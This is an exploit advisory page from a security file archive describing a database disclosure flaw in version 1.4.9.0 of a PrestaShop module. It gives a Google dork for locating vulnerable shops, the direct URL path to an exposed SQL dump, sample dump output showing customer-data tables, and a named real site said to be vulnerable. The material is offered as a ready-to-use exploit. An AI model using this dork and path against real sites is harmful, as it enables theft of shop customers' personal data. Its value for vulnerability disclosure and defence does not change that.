what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

PrestaShop yllyaidechantier 1.4.9.0 Database Disclosure

PrestaShop yllyaidechantier 1.4.9.0 Database Disclosure
Posted Dec 24, 2018
Authored by KingSkrupellos

PrestaShop yllyaidechantier module version 1.4.9.0 suffers from a database disclosure vulnerability.

tags | exploit, info disclosure
SHA-256 | cb38aa19f54761181d1e7256da153d82ac622909a53939e2a2ead2c176bf68d6

PrestaShop yllyaidechantier 1.4.9.0 Database Disclosure

Change Mirror Download
###########################################################################

# Exploit Title : PrestaShop yllyaidechantier Modules 1.4.9.0 Database
Disclosure
# Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security
Army
# Date : 24/12/2018
# Vendor Homepage : prestashop.com
# Software Download Link : N/A
# Tested On : Windows and Linux
# Category : WebApps
# Version Information : 1.4.9.0
# Exploit Risk : Medium
# Google Dorks : inurl:''/modules/yllyaidechantier/db/''
# Vulnerability Type : CWE-264 - [ Permissions, Privileges, and Access
Controls ]
CWE-23 - [ Relative Path Traversal ] - CWE-200 [ Information Exposure ]

###########################################################################

# Exploit :

/modules/yllyaidechantier/db/ydb.sql

###########################################################################

# Example SQL Database Dump Information Exposure =>

-- phpMyAdmin SQL Dump
-- version 4.0.4
-- http://www.phpmyadmin.net
--
-- Client: localhost
--
GA(c)nA(c)rA(c) le: Lun 07 Avril 2014 A 16:27
-- Version du serveur: 5.5.20-log
-- Version de PHP: 5.3.10

SET
SQL_MODE = "NO_AUTO_VALUE_ON_ZERO";
SET time_zone = "+00:00";


/*!40101 SET
@OLD_CHARACTER_SET_CLIENT=@@CHARACTER_SET_CLIENT */;
/*!40101 SET
@OLD_CHARACTER_SET_RESULTS=@@CHARACTER_SET_RESULTS */;
/*!40101 SET
@OLD_COLLATION_CONNECTION=@@COLLATION_CONNECTION */;
/*!40101
SET NAMES utf8 */;

--
-- Base de donnA(c)es: `velux`
--
CREATE DATABASE IF NOT EXISTS `velux`
DEFAULT CHARACTER SET latin1 COLLATE latin1_swedish_ci;
USE `velux`;

-- --------------------
------------------------------------

--
-- Structure de la table `ps_y_aidechantier_demande`
--


DROP TABLE IF EXISTS `ps_y_aidechantier_demande`;
CREATE TABLE IF NOT EXISTS
`ps_y_aidechantier_demande` (
`id_demande` int(11) NOT NULL AUTO_INCREMENT,
`id_template
` int(11) NOT NULL,
`id_customer` int(11) NOT NULL,
`id_scenario` int(11) NOT NULL,
`lastname`
varchar(500) NOT NULL,
`firstname` varchar(500) NOT NULL,
`phone` varchar(50) NOT NULL,

`email` varchar(500) NOT NULL,
`fax` varchar(50) NOT NULL,
`chantier_charpente` varchar(500)
NOT NULL,
`chantier_couverture` varchar(500) NOT NULL,
`chantier_fenetre` varchar(500) NOT NULL,

`chantier_raccord` varchar(500) NOT NULL,
`chantier_isolation` varchar(500) NOT NULL,

`chantier_domotique` varchar(500) NOT NULL,
`date_add` date NOT NULL,
PRIMARY KEY
(`id_demande`)
) ENGINE=InnoDB DEFAULT CHARSET=latin1 AUTO_INCREMENT=1 ;

-- ----------------
----------------------------------------

--
-- Structure de la table `ps_y_aidechantier_scenario`
--

DROP TABLE IF
EXISTS `ps_y_aidechantier_scenario`;
CREATE TABLE IF NOT EXISTS `ps_y_aidechantier_scenario`
(
`id_scenario` int(11) NOT NULL AUTO_INCREMENT,
`id_template` int(11) NOT NULL,

`title` varchar(500) NOT NULL,
`price` double NOT NULL,
`date_add` date NOT NULL,

PRIMARY KEY (`id_scenario`)
) ENGINE=InnoDB DEFAULT CHARSET=latin1
AUTO_INCREMENT=3 ;

-- --------------------------------------------------------

--
-- Structure de la table
`ps_y_aidechantier_template`
--

DROP TABLE IF EXISTS `ps_y_aidechantier_template`;
CREATE
TABLE IF NOT EXISTS `ps_y_aidechantier_template` (
`id_template` int(11)
NOT NULL AUTO_INCREMENT,
`id_product` int(11) NOT NULL,
`name` varchar(500) NOT NULL,

`date_add` date NOT NULL,
PRIMARY KEY (`id_template`),
UNIQUE KEY `id_product_2` (`id_product`),

KEY `id_product` (`id_product`)
) ENGINE=InnoDB DEFAULT CHARSET=latin1
AUTO_INCREMENT=8 ;

/*!40101 SET CHARACTER_SET_CLIENT=@OLD_CHARACTER_SET_CLIENT
*/;
/*!40101 SET CHARACTER_SET_RESULTS=@OLD_CHARACTER_SET_RESULTS */;
/*!40101
SET COLLATION_CONNECTION=@OLD_COLLATION_CONNECTION */;


###########################################################################

# Example Vulnerable Site =>

[+] portailpro.fr/modules/yllyaidechantier/db/ydb.sql

###########################################################################

# Discovered By Hacker KingSkrupellos from Cyberizm.Org Digital Security
Team

###########################################################################
Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    42 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close